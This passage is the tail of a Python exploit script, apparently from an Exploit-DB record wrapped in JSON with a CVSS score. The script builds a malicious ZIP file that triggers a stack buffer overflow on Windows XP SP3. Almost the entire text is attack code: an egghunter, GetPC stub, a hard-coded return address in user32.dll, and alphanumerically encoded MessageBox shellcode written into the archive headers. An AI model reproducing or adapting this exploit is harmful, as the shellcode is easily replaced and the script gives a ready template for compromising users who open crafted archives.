\r\n\"\\x02\\x10\\x00\\x00\" \r\n\"\\x00\\x00\")\r\n\r\n#egg esi, will jump to edi\r\negg = \"VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI\"\r\negg += \"avMQzjioDOW2PRqzERCh8MVNGLC51J0tJOLxpwDptpQdlKXzloaeKZnO45IwkOM7A\"\r\ngetpc=\"\\x89\\x05\\x5e\\x98\\x99\\x46\\x46\\x8a\\x94\\x98\\x98\\x98\"\r\ngetpc += \"\\x74\\x07\\x46\\x46\\x49\\x73\\x97\" #loop\r\ngetpc += \"\\x77\\x85\" #jump before getpc\r\ngetpc += \"\\x46\\x41\\x41\\x41\" #nops\r\nnop=\"\\x42\\x42\\x33\\x90\\x41\\x41\\x41\\x41\\x41\\x41\" #nops + prepare loop\r\nsize=272\r\n\r\nret = 
\"\\x7C\\x22\\x48\\x7E\" # 0x7E48227C user32.dll XP SP3\r\nbuff = \"\\x41\" * (125-len(nop))\r\nbuff += nop + getpc + egg + \"\\x77\\x9F\" #jmp between getpc and egg\r\nbuff += \"\\x41\" * (size-len(buff))\r\nbuff += ret\r\nbuff += \"\\x41\\x77\\xA4\\x42\" #jump back\r\nbuff += \"\\x3c\\x44\\x40\\x00\" # null byte to avoid writing over end of stack (no SEH)\r\nbuff += \"w00tw00t\"\r\n#edi basereg - MessageBox shellcode\r\nbuff += \"WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyIHkmKzyt4utzTt\"\r\nbuff += \"qXRmbBZFQhIRDnkqavPLKqfdLNkrV7lNk1VwxLKSNQ0NkDvTxpOdXrUl3SiVa8QyoM1\"\r\nbuff += \"1pNkRLwTDdlKQUwLnksdS5d8Wq8jnkQZwhLKQJq05QjKM3egQYnkVTLK31JNUaIoVQY\"\r\nbuff += \"PKLNLK4O0cDfjKq8OVmUQIWyyHqKOYokOUkalgTdhSEyNnkBz5tVaJK2FNkTLPKLKrz\"\r\nbuff += \"GlUQZKNkUTNkUQzHnipDwTUL3QKsoBwx5yXTNixeMYhBSXNnpNVnxlbrYxOlKOkOKOK\"\r\nbuff += \"9qUwtMk3NxXM2rSNgWlgT2rixlKkOkOYoK9pEeXqx2LrLupYo58wC026Natph0u2SSU\"\r\nbuff += \"proxSlWTDJLIXfrvkORuWtoyhBRpMkMxLbrmOLMWgl14v2yxcnkOKOKOaxRlQQrnQHQ\"\r\nbuff += \"xBc2orrsutqKkMXQLq4uWMYKSsXprV8gPupPhpcFPsTecQxu5bLaq0nCXEpqs0oBR1x\"\r\nbuff += \"cTepqrRY3XPopwbNSUvQ9Yk8pLWTWeMYyqdqzrBrV3saPRyozpTqo0rpKO1EUXA\"\r\nbuff += \"\\x43\" * (4064-len(buff)) # 4064\r\nbuff += \".txt\"\r\n\r\n\r\nprint \" [+] Writing payload to file corelanc0d3r_tweakfs.zip\"\r\nmefile = open('corelanc0d3r_tweakfs.zip','w');\r\nmefile.write(ldf_header + buff + cdf_header + buff + eofcdf_header);\r\nmefile.close()\r\nprint \" [+] Wrote \" + str(len(buff))+ \" bytes to file\"", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/12293/"}]}